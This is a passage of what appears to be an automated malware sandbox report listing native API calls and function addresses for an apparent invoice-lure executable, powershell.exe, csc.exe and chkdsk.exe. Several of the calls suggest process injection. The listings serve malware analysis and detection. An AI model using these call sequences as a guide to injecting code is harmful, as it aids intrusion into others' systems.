            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2BA0 NtEnumerateValueKey,14_2_053E2BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2B80 NtQueryInformationFile,14_2_053E2B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2BF0 NtAllocateVirtualMemory,14_2_053E2BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2BE0 NtQueryValueKey,14_2_053E2BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2AB0 NtWaitForSingleObject,14_2_053E2AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2AF0 NtWriteFile,14_2_053E2AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2AD0 NtReadFile,14_2_053E2AD0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054235C0 NtCreateMutant,LdrInitializeThunk,23_2_054235C0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05424650 NtSuspendThread,LdrInitializeThunk,23_2_05424650
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05424340 NtSetContextThread,LdrInitializeThunk,23_2_05424340
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422D10 NtMapViewOfSection,LdrInitializeThunk,23_2_05422D10
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422D30 NtUnmapViewOfSection,LdrInitializeThunk,23_2_05422D30
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422DD0 NtDelayExecution,LdrInitializeThunk,23_2_05422DD0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422DF0 NtQuerySystemInformation,LdrInitializeThunk,23_2_05422DF0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422C60 NtCreateKey,LdrInitializeThunk,23_2_05422C60
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422C70 NtFreeVirtualMemory,LdrInitializeThunk,23_2_05422C70
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422CA0 NtQueryInformationToken,LdrInitializeThunk,23_2_05422CA0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422F30 NtCreateSection,LdrInitializeThunk,23_2_05422F30
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422FE0 NtCreateFile,LdrInitializeThunk,23_2_05422FE0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422FB0 NtResumeThread,LdrInitializeThunk,23_2_05422FB0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422EE0 NtQueueApcThread,LdrInitializeThunk,23_2_05422EE0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422E80 NtReadVirtualMemory,LdrInitializeThunk,23_2_05422E80
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054239B0 NtGetContextThread,LdrInitializeThunk,23_2_054239B0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422B60 NtClose,LdrInitializeThunk,23_2_05422B60
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422BE0 NtQueryValueKey,LdrInitializeThunk,23_2_05422BE0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422BF0 NtAllocateVirtualMemory,LdrInitializeThunk,23_2_05422BF0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422BA0 NtEnumerateValueKey,LdrInitializeThunk,23_2_05422BA0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422AD0 NtReadFile,LdrInitializeThunk,23_2_05422AD0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422AF0 NtWriteFile,LdrInitializeThunk,23_2_05422AF0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05423010 NtOpenDirectoryObject,23_2_05423010
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05423090 NtSetValueKey,23_2_05423090
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05423D70 NtOpenThread,23_2_05423D70
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422D00 NtSetInformationFile,23_2_05422D00
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05423D10 NtOpenProcessToken,23_2_05423D10
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422DB0 NtEnumerateKey,23_2_05422DB0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422C00 NtQueryInformationProcess,23_2_05422C00
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422CC0 NtQueryVirtualMemory,23_2_05422CC0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422CF0 NtOpenProcess,23_2_05422CF0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422F60 NtCreateProcessEx,23_2_05422F60
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422F90 NtProtectVirtualMemory,23_2_05422F90
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422FA0 NtQuerySection,23_2_05422FA0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422E30 NtWriteVirtualMemory,23_2_05422E30
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422EA0 NtAdjustPrivilegesToken,23_2_05422EA0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422B80 NtQueryInformationFile,23_2_05422B80
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05422AB0 NtWaitForSingleObject,23_2_05422AB0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_00777450 NtCreateFile,23_2_00777450
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_007775B0 NtReadFile,23_2_007775B0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_00777690 NtDeleteFile,23_2_00777690
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_00777720 NtClose,23_2_00777720
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_00777880 NtAllocateVirtualMemory,23_2_00777880
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF734106EA86_2_00007FF734106EA8
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F05546_2_00007FF7340F0554
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340FC53C6_2_00007FF7340FC53C
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F2D5C6_2_00007FF7340F2D5C
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F5D9C6_2_00007FF7340F5D9C
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F0D9C6_2_00007FF7340F0D9C
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340FE6006_2_00007FF7340FE600
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F36A06_2_00007FF7340F36A0
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340FBEBC6_2_00007FF7340FBEBC
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F4F046_2_00007FF7340F4F04
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F07586_2_00007FF7340F0758
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF73410680C6_2_00007FF73410680C
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F28506_2_00007FF7340F2850
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7341031D86_2_00007FF7341031D8
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340FBA286_2_00007FF7340FBA28
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF734104A206_2_00007FF734104A20
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340FD2AC6_2_00007FF7340FD2AC
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F12A86_2_00007FF7340F12A8
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F03506_2_00007FF7340F0350
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340FFC586_2_00007FF7340FFC58
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF734101CC86_2_00007FF734101CC8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887DBCE039_2_00007FF887DBCE03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887DC5C109_2_00007FF887DC5C10
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887DBDBB39_2_00007FF887DBDBB3
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887DC18A09_2_00007FF887DC18A0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887DC8FE99_2_00007FF887DC8FE9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887DC5E829_2_00007FF887DC5E82
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887DC1E309_2_00007FF887DC1E30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887DC1E309_2_00007FF887DC1E30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887DC94719_2_00007FF887DC9471
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887DC19E09_2_00007FF887DC19E0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887E831539_2_00007FF887E83153
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_00401ABA14_2_00401ABA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0040100014_2_00401000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_004028DD14_2_004028DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_004028E014_2_004028E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0040309014_2_00403090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0040120014_2_00401200
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_00404B9714_2_00404B97
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_00402BA014_2_00402BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0042D54314_2_0042D543
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0040FD3314_2_0040FD33
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0041661E14_2_0041661E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0041662314_2_00416623
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_004026AE14_2_004026AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_00401EB014_2_00401EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_004026B014_2_004026B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0040375014_2_00403750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0040FF5314_2_0040FF53
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0040DFCA14_2_0040DFCA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0040DFD314_2_0040DFD3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B053514_2_053B0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546757114_2_05467571
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0547059114_2_05470591
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0544D5B014_2_0544D5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546244614_2_05462446
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A146014_2_053A1460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546F43F14_2_0546F43F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0545E4F614_2_0545E4F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B077014_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D475014_2_053D4750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546F7B014_2_0546F7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AC7C014_2_053AC7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054616CC14_2_054616CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CC6E014_2_053CC6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0547B16B14_2_0547B16B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A010014_2_053A0100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F17214_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E516C14_2_053E516C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0544A11814_2_0544A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054681CC14_2_054681CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BB1B014_2_053BB1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054701AA14_2_054701AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0545F0CC14_2_0545F0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546F0E014_2_0546F0E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054670E914_2_054670E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B70C014_2_053B70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546A35214_2_0546A352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546132D14_2_0546132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539D34C14_2_0539D34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054703E614_2_054703E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053F739A14_2_053F739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BE3F014_2_053BE3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0545027414_2_05450274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B52A014_2_053B52A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054512ED14_2_054512ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CB2C014_2_053CB2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05461D5A14_2_05461D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05467D7314_2_05467D73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BAD0014_2_053BAD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B3D4014_2_053B3D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C8DBF14_2_053C8DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AADE014_2_053AADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CFDC014_2_053CFDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0C0014_2_053B0C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05429C3214_2_05429C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546FCF214_2_0546FCF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A0CF214_2_053A0CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05450CB514_2_05450CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05424F4014_2_05424F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D0F3014_2_053D0F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053F2F2814_2_053F2F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546FF0914_2_0546FF09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B1F9214_2_053B1F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BCFE014_2_053BCFE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A2FC814_2_053A2FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546FFB114_2_0546FFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546EE2614_2_0546EE26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0E5914_2_053B0E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B9EB014_2_053B9EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546EEDB14_2_0546EEDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C2E9014_2_053C2E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546CE9314_2_0546CE93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C696214_2_053C6962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B995014_2_053B9950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CB95014_2_053CB950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B29A014_2_053B29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0547A9A614_2_0547A9A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0541D80014_2_0541D800
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BA84014_2_053BA840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B284014_2_053B2840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053968B814_2_053968B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE8F014_2_053DE8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B38E014_2_053B38E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546AB4014_2_0546AB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546FB7614_2_0546FB76
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05466BD714_2_05466BD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CFB8014_2_053CFB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053EDBF914_2_053EDBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05467A4614_2_05467A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546FA4914_2_0546FA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05423A6C14_2_05423A6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0545DAC614_2_0545DAC6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053F5AA014_2_053F5AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AEA8014_2_053AEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0544DAAC14_2_0544DAAC
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F053523_2_053F0535
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054A757123_2_054A7571
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054B059123_2_054B0591
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0548D5B023_2_0548D5B0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054A244623_2_054A2446
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053E146023_2_053E1460
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AF43F23_2_054AF43F
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0549E4F623_2_0549E4F6
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0541475023_2_05414750
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F077023_2_053F0770
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AF7B023_2_054AF7B0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053EC7C023_2_053EC7C0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054A16CC23_2_054A16CC
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0540C6E023_2_0540C6E0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054BB16B23_2_054BB16B
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0542516C23_2_0542516C
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053E010023_2_053E0100
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053DF17223_2_053DF172
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0548A11823_2_0548A118
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054A81CC23_2_054A81CC
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053FB1B023_2_053FB1B0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054B01AA23_2_054B01AA
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0549F0CC23_2_0549F0CC
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054A70E923_2_054A70E9
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AF0E023_2_054AF0E0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F70C023_2_053F70C0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AA35223_2_054AA352
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054A132D23_2_054A132D
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053DD34C23_2_053DD34C
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054B03E623_2_054B03E6
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053FE3F023_2_053FE3F0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0543739A23_2_0543739A
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0549027423_2_05490274
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0540B2C023_2_0540B2C0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F52A023_2_053F52A0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054912ED23_2_054912ED
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054A1D5A23_2_054A1D5A
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054A7D7323_2_054A7D73
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053FAD0023_2_053FAD00
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F3D4023_2_053F3D40
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0540FDC023_2_0540FDC0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053EADE023_2_053EADE0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05408DBF23_2_05408DBF
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F0C0023_2_053F0C00
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05469C3223_2_05469C32
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AFCF223_2_054AFCF2
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053E0CF223_2_053E0CF2
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05490CB523_2_05490CB5
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05464F4023_2_05464F40
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AFF0923_2_054AFF09
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05432F2823_2_05432F28
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05410F3023_2_05410F30
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F1F9223_2_053F1F92
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053FCFE023_2_053FCFE0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053E2FC823_2_053E2FC8
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AFFB123_2_054AFFB1
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F0E5923_2_053F0E59
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AEE2623_2_054AEE26
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F9EB023_2_053F9EB0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AEEDB23_2_054AEEDB
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05402E9023_2_05402E90
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054ACE9323_2_054ACE93
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0540B95023_2_0540B950
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0540696223_2_05406962
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F995023_2_053F9950
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F29A023_2_053F29A0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054BA9A623_2_054BA9A6
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053FA84023_2_053FA840
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F284023_2_053F2840
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053D68B823_2_053D68B8
